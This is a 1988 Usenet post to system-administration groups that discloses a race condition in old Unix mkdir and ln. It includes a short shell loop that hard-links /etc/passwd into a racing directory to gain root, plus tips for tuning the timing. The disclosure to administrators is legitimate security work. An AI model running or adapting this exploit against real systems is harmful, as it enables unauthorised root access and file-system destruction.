Xref: utzoo news.sysadmin:1787 news.admin:4155
Path: utzoo!utgpu!watmath!clyde!att!rutgers!cmcl2!nrl-cmf!ukma!gatech!purdue!decwrl!sun!pitstop!sundc!seismo!uunet!mcvax!unido!altger!blue
From: blue@altger.UUCP (blue)
Newsgroups: news.sysadmin,news.admin
Subject: security hole
Keywords: security, bug
Message-ID: <1191@altger.UUCP>
Date: 2 Dec 88 00:27:20 GMT
Organization: Altos Computer Systems Munich
Lines: 28

I am probably saying something already known by everybody.
Anyway, there's (was) a bug on many Unix systems, related to
the mkdir and ln commands.
Practically, ANYONE could be root on such systems, by working out
a simple shell script like this one:

   while true
		do
			   nice -39 mkdir foo &
               rm -rf foo
			   ln /etc/passwd foo; rm -fr foo &
			   ls -l /etc/passwd
        done

What happens is that sometimes - on old versions - you fool Unix by catching
mkdir while it is creating its i-nodes. There has to be a millisecond while
mkdir has created HIS foo, and is going to change ownership to yours.
Ok, being new on Usenet maybe i missed this explanation 1000 times.
What's incredible is that this trick worked out perfectly few months ago
on altger here, an Altos 386 running Unix Sys V.3, worked again on
Unix/386 i think on IBM PS-2/80, where instead of passwd /dev/hd00 was
linked successfully (system: aragon). Worked still better on Altos Xenix
386 (altos 2000? dos the "linker" does not work, but all you have to do is change
the nice value, add some slowdown , run two linkers at the same time etc.

Side effects: file system will need to be checked out after reboot.
Worst side effects: if this works , run by an hacker, you probably
won't find any file system at all...